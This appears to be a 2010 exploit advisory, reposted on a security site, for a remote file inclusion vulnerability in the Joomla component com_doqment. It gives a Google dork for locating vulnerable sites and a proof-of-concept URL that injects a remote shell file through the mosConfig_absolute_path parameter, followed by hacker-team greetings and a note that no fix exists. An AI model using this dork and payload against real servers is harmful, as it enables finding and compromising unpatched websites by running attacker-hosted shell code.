[D] Joomla Component com_doqment Remote File Inclusion Vulnerability [z]

2010-12-24 16:37:27
Inviato da: kedans

# Name : [D] Joomla Component com_doqment Remote File Inclusion Vulnerability [z]

# Date : 21/11/2010

# Author : KedAns-Dz < ked-h (at) hotmail (dot) com >

# Team : [D] HaCkerS-StreeT-Team [z]

# special thanks to : BadR0 (+) Nor0 FouinY

# greetz to : XoreR (+) Fox-Dz (+) Dr.Ride (+) Islampard (+) Hani Nin0 (+)

// Zaki.ENG (+) Masinhou-Dz (+) MaTmour13

Allahou AkbaR -- 1 2 3 ViVa l'Algerie

:::::::::::::::::::::::::::::::::::::::(0x1a)::::::::::::::::::::::::::::::::::::::::

G0ogle Dork : inurl:com_doqment

:::::::::::::::::::::::::::::::::::::::(0x2a)::::::::::::::::::::::::::::::::::::::::

Exploit & p0c :

--> http://[SERVER]/index.php?option=com_doqment&cid=admin.ponygallery.html.php?mosConfig_absolute_path=[ Sh3ll.TxT ]


::::::::::::::::::::::::::::::::::::::(0x3a):::::::::::::::::::::::::::::::::::::::::::

[D] HaCkerS-StreeT-Team [Z]

>> KedAns-Dz (+) BadR0 (+) Dr.Ride (+) XoreR (+) Fox-Dz <<

> Red1One (+) Islampard (+) NoR0 FouinY (+) Hani Nin0 (+) Masinhou-Dz <

:::::::::::::::::::::::::::::: By KedAns DZ :::::::::::::::::::::::::::::::::::::::::::

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.